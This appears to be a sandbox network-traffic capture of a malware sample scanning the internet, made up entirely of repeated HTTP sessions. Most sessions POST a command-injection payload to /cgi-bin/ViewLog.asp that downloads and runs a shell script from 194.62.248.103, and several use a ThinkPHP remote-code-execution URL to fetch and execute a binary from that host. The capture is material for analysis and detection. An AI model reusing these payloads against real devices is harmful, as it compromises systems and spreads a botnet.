                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        430192.168.2.235433494.253.21.1718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:06.016334057 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:06.391437054 CEST21INHTTP/1.1
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        431192.168.2.233552631.128.220.1118080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:06.017040968 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:06.367641926 CEST469INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/html; charset=utf-8
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        Strict-Transport-Security: max-age=3600
                                                        Content-Length: 130
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        432192.168.2.235051095.216.78.348080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:06.331592083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:06.657897949 CEST490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:36:06 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        433192.168.2.233372295.65.1.2298080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:06.344573975 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        434192.168.2.233614494.122.25.2248080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:06.357168913 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        435192.168.2.235047888.221.182.9680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:07.168775082 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:07.463284969 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:07 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:07 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 63 33 65 31 32 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 36 37 26 23 34 36 3b 32 32 65 39 66 32 38 61 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 63 63 33 65 31 32 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 36 37 26 23 34 36 3b 32 32 65 39 66 32 38 61 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;cc3e1202&#46;1713105367&#46;22e9f28a<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;cc3e1202&#46;1713105367&#46;22e9f28a</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        436192.168.2.234487488.197.28.19380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:07.214787006 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:07.555708885 CEST404INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:07 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        437192.168.2.234272894.123.47.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.019207954 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        438192.168.2.234098285.209.89.1078080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.019785881 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        439192.168.2.235992294.121.59.628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.020560026 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        440192.168.2.233905231.131.139.1158080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.023621082 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:08.371499062 CEST334INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:36:08 GMT
                                                        Connection: Close
                                                        Cache-Control: no-store
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: DENY
                                                        Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.ookla.com *.speedtest.net *.speedtestcustom.com


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        441192.168.2.234896485.72.214.1948080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.032493114 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        442192.168.2.235727831.136.239.388080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.032588005 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:09.020044088 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:10.971771002 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.035381079 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:22.970082045 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:38.583983898 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:10.067631960 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        443192.168.2.235586231.136.23.338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:08.033668041 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:09.020047903 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:10.971801043 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.035384893 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:22.970196962 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:38.584089994 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
